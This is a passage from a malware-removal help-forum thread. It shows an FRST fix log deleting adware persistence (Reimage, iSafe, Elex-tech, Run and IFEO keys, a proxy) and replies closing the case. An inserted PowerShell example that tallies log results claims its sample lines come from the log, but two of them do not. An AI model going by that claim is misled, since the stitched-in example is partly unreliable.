HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 => key removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_CB883AFA019B4C7DB2A0EDE0EE48A17C => value removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => value removed successfully
C:\Users\Yves\AppData\Local\background_fault => moved successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_D86E271F0C07DE39109C5B55DCDECA36 => value removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_941A751A450632976DD0BE07C090C392 => value removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => value removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => key removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => key removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{790B50EC-2BBA-11E7-B94C-64006A5CFC23} => value removed successfully
HKLM\Software\Classes\CLSID\{790B50EC-2BBA-11E7-B94C-64006A5CFC23} => key removed successfully
HKLM\System\CurrentControlSet\Services\WinSAPSvc => key removed successfully
WinSAPSvc => service removed successfully
C:\Users\Yves\AppData\Roaming\Njtain => moved successfully
iSafeKrnl => service not found.
iSafeKrnlKit => service not found.
HKLM\System\CurrentControlSet\Services\iSafeKrnlMon => key removed successfully
iSafeKrnlMon => service removed successfully
iSafeKrnlR3 => service not found.
iSafeNetFilter => service not found.
"C:\Windows\System32\Tasks\ReimageUpdater" => not found.
"C:\ProgramData\Reimage Protector" => not found.
"C:\rei" => not found.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair" => not found.
C:\Program Files\Reimage => moved successfully
"C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk" => not found.
C:\Users\Yves\Downloads\ResetBrowser.exe => moved successfully
C:\Users\Yves\Desktop\adwcleaner_7.0.2.1.exe => moved successfully
C:\Windows\Reimage.ini => moved successfully
C:\Users\Yves\Downloads\ReimageRepair.exe => moved successfully
"C:\Program Files (x86)\Elex-tech" => not found.
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 76315958 B
Java, Flash, Steam htmlcache => 13796 B
Windows/system/drivers => 1109947675 B
Edge => 0 B
Chrome => 0 B
Firefox => 112400622 B
Opera => 99114214 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 58568987 B
systemprofile32 => 66945893 B
LocalService => 66356 B
NetworkService => 915534 B
Yves => 2132418288 B

RecycleBin => 0 B
EmptyTemp: => 3.4 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 12:12:43 ====

Moving on to point 2
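The Fixlog above contains one result line per fixlist directive. The "not found" entries are expected here only because YAC (the Elex-tech drivers) and Reimage (the ReimageUpdater task and folders) had been uninstalled by hand before the fix, as the previous post instructed; a "not found" for an item that was not removed beforehand would mean it is still on the machine under another path. The PowerShell function below, added here as an example and not part of the original post or of FRST, tallies the outcomes and collects the "not found" items so that check can be made at a glance. The sample lines are copied from the log above; the function and category names are this example's own.

```powershell
# Added example, not from the original thread or from FRST. Tallies the result
# lines of an FRST Fixlog and collects the "not found" items, so each one can be
# matched against what was removed by hand before the fix. The sample lines are
# copied from the log above; function and category names are this example's own.

function Get-FixlogSummary([string[]]$Lines) {
    $removed = 0; $notFound = 0; $other = 0
    $notFoundItems = New-Object System.Collections.Generic.List[string]
    foreach ($line in $Lines) {
        # Result lines have the shape "<item> => <outcome>"; everything else in
        # the log (fixlist echo, section banners, EmptyTemp byte counts) is skipped.
        if (-not ($line -match '^(?<target>.+?)\s*=>\s*(?<result>.+?)\.?\s*$')) { continue }
        $target = $Matches['target'].Trim('"')   # FRST quotes paths it could not find
        $result = $Matches['result']             # copy before the switch overwrites $Matches
        switch -regex ($result) {
            'removed successfully|moved successfully|restored successfully' { $removed++; break }
            'not found' { $notFound++; $notFoundItems.Add($target); break }
            default { $other++ }
        }
    }
    [pscustomobject]@{ Removed = $removed; NotFound = $notFound; Other = $other; NotFoundItems = $notFoundItems }
}

# Constructed sample: a few lines taken from the Fixlog posted above.
$sample = @'
C:\Program Files (x86)\MIO => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => key removed successfully
C:\Windows\System32\Tasks\ReimageUpdater => not found.
iSafeKrnl => service not found.
WinSAPSvc => service removed successfully
"C:\Program Files (x86)\Elex-tech" => not found.
Hosts restored successfully.
BITS transfer queue => 8388608 B
'@ -split "`r?`n"

$summary = Get-FixlogSummary $sample    # Removed 3, NotFound 3, Other 1
$summary | Format-List
```

On a real machine, pass the Fixlog.txt that FRST writes next to its own executable: `Get-FixlogSummary (Get-Content .\Fixlog.txt)`. Every path in NotFoundItems should correspond to a program that was uninstalled before the fix was run.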

Corum
Posts: 4
Joined: 07 Sep 2017 14:03

Re: Need help with an infection

Post by Corum » 08 Sep 2017 15:06


Malekal_morte
Site Admin
Posts: 87572
Joined: 10 Sep 2005 13:57

Re: Need help with an infection

Post by Malekal_morte » 08 Sep 2017 17:06

Are there any particular problems left?


Corum
Posts: 4
Joined: 07 Sep 2017 14:03

Re: Need help with an infection

Post by Corum » 08 Sep 2017 18:18

No, a priori it's all good,
thank you for your precious help.

How can I thank you?

Malekal_morte
Site Admin
Posts: 87572
Joined: 10 Sep 2005 13:57

Re: Need help with an infection

Post by Malekal_morte » 09 Sep 2017 12:19

good =)

You can delete the C:\FRST folder =)

Finish with a clean-up with Malwarebytes Anti-Malware (MBAM) free version
Avoid regular ZHPCleaner and AdwCleaner scans and clean-ups, not useful.


A few tips:

So you don't get caught again.
Read - Parasitic programs / PUPs: Adware/PUP dossier: unwanted and parasitic programs
(Above all, enable PUP detection to detect parasitic and advertising programs)

